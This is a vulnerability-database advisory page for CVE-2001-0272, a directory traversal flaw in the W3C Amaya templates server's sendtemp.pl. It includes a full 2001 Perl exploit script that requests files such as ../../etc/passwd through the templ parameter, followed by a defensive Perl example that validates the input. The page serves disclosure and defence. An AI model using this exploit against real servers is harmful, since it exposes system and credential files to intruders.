CVE-2001-0272
CVSS 5.0
Published: 2001-05-03 00:00:00
Revised: 2008-09-05 16:23:42

[Original] Directory traversal vulnerability in sendtemp.pl in W3.org Anaya Web development server allows remote attackers to read arbitrary files via a .. (dot dot) attack in the templ parameter.


[CNNVD] W3C Amaya Templates Server sendtemp.pl remote directory traversal vulnerability (CNNVD-200105-031)

        
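        W3C's Amaya is a WYSIWYG web browser and authoring program. It has a component called the templates server, which can fetch templates from an Apache web server for use in Amaya-based authoring.
        sendtemp.pl, a script in the Amaya templates server, has an input validation flaw in its implementation. A remote attacker may exploit it to traverse the server's directories and read any file that the Apache server process has permission to read.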
        

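- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]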

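- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0272
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0272
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-031
(Official data source) CNNVD

- Other links and resources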

http://archives.neohapsis.com/archives/bugtraq/2001-02/0259.html
(VENDOR_ADVISORY)  BUGTRAQ  20010212 W3.ORG sendtemp.pl

- Vulnerability information

W3C Amaya Templates Server sendtemp.pl remote directory traversal vulnerability
Medium risk  Unknown
2001-05-03 00:00:00 2005-10-20 00:00:00
Remote
        
        

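- Advisories and patches

        Vendor patch:
        W3C
        ---
        The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
        
        http://www.w3.org/Amaya/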

- Vulnerability information (289)

sendtemp.pl Read Access to Files (EDBID:289)
cgi webapps
2001-03-04 Verified
0 Tom Parker
N/A
#!/usr/bin/perl -w

# sendtemp.pl: A part of the Amaya Web development
# server contains a file disclosure  vulnerability, 
# which allows remote, read access to files 
# on the server's file system,  as whichever 
# user the httpd is running as.
#
# The Vulnerability is really quite simple..
# When the `templ` argument is passed to
# sendtemp.pl it adds a link to the chosen stylesheet
# and a META field containing the publication's 
# URL of the new file to the chosen template.
# For example:
# http://localhost/cgi-bin/sendtemp.pl?templ=template.xml
# This is all well and good,  however.. 
# There is no sanity checking on the param you pass to the script..
# Ie: my $temp_file = param("templ");
#
# So by simply issuing a GET to:
# "http://localhost/cgi-bin/sendtemp.pl?templ=../../etc/passwd"
# The system's file system can be traversed and the passwd file can be read. 
# (Assuming the http daemon hasn't been run under chroot())
#
# Follows is a simple exploit.. however, it's just as easy 
# to do this manually in your web browser.
# I really couldn't be bothered to format the output in any way,
# It only encourages script kiddies.
#
# Finally, "l33t hax0r greetz" to..
# ne0h, b0red, loophole, shad0w and the old dL crew..
# Scott, Jim, Mike.. All of the guys at Global Intersec.
#
# Tom Parker - tom@rooted.net
# MRX of HHP-Programming (www.hhp-programming.net)
# Global InterSec INC California - Security Audits, Penetration testing, code auditing.

use IO::Socket;
print qq~
----------------------------------------------------------
W3.ORG sendtemp.pl exploit by Tom Parker - tom\@rooted.net
    MRX of HHP-Programming (www.hhp-programming.net)
	  -  Global InterSec INC California -
----------------------------------------------------------
~;
if((!defined($ARGV[0]))||(!defined($ARGV[1]))) { print "Usage\: \%filename\.pl \<hostname\> \<file-to-get\>\n"; exit 0; }
$SOCKET = IO::Socket::INET->new("$ARGV[0]:80");
print $SOCKET "GET /cgi-bin/sendtemp.pl?templ=$ARGV[1]\n";
print "Sent request for $ARGV[1] (http://$ARGV[0]/cgi-bin/sendtemp.pl\?templ\=$ARGV[1])\n";
while(<$SOCKET>) {
push @DATA, $_;

}
my $woot = join(' ',@DATA);
if($woot =~/$ARGV[1] wasn't found/) { print "$ARGV[1] dosnt seem to exist.\n"; exit 0; } 
else { print "@DATA"; }

# milw0rm.com [2001-03-04]
		
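The exploit comments above trace the flaw to `my $temp_file = param("templ");` being used with no checks. The Perl below is an added example (not code from this page, the exploit author, or the Amaya project) showing one way a CGI script can confine such a value to a single template directory; `resolve_template`, the allowed extensions, and the temporary directory with its sample files are assumptions constructed for the demonstration.

```perl
#!/usr/bin/perl
# Added example: confine a CGI "templ" value to one template directory.
# resolve_template() and the sample directory are hypothetical, not Amaya code.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Returns the canonical path of the requested template, or undef when the
# request is rejected.
sub resolve_template {
    my ($template_dir, $name) = @_;
    return undef unless defined $name;

    # 1. Allow-list the name: one path component, no slashes, no leading dot,
    #    fixed extensions. "../../etc/passwd" fails here.
    return undef
        unless $name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\.(?:xml|html)\z/;

    # 2. Canonicalise and confirm the result is still inside the template
    #    directory; this also catches a symlink that points outside it.
    my $base = realpath($template_dir);
    return undef unless defined $base;
    my $full = realpath(File::Spec->catfile($base, $name));
    return undef unless defined $full && -f $full;
    return undef unless index($full, "$base/") == 0;
    return $full;
}

# Constructed demonstration data: one real template and one escaping symlink.
my $dir = tempdir(CLEANUP => 1);
open(my $fh, '>', "$dir/template.xml") or die "cannot create sample: $!";
print {$fh} "<html/>\n";
close($fh);
symlink('/etc/passwd', "$dir/link.xml");

for my $templ ('template.xml', '../../etc/passwd', '/etc/passwd',
               "template.xml\0.html", 'link.xml', 'missing.xml') {
    my $path = resolve_template($dir, $templ);
    (my $shown = $templ) =~ s/\0/\\0/g;
    printf "%-22s %s\n", $shown, defined $path ? 'served' : 'rejected';
}
```

Only `template.xml` is served; the traversal string, the absolute path, the NUL-embedded name, the symlink and the missing file are all rejected before any file is opened.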

- Vulnerability information

510
W3.org Anaya Web sendtemp.pl templ Variable Traversal Arbitrary File Access
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2001-02-12 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
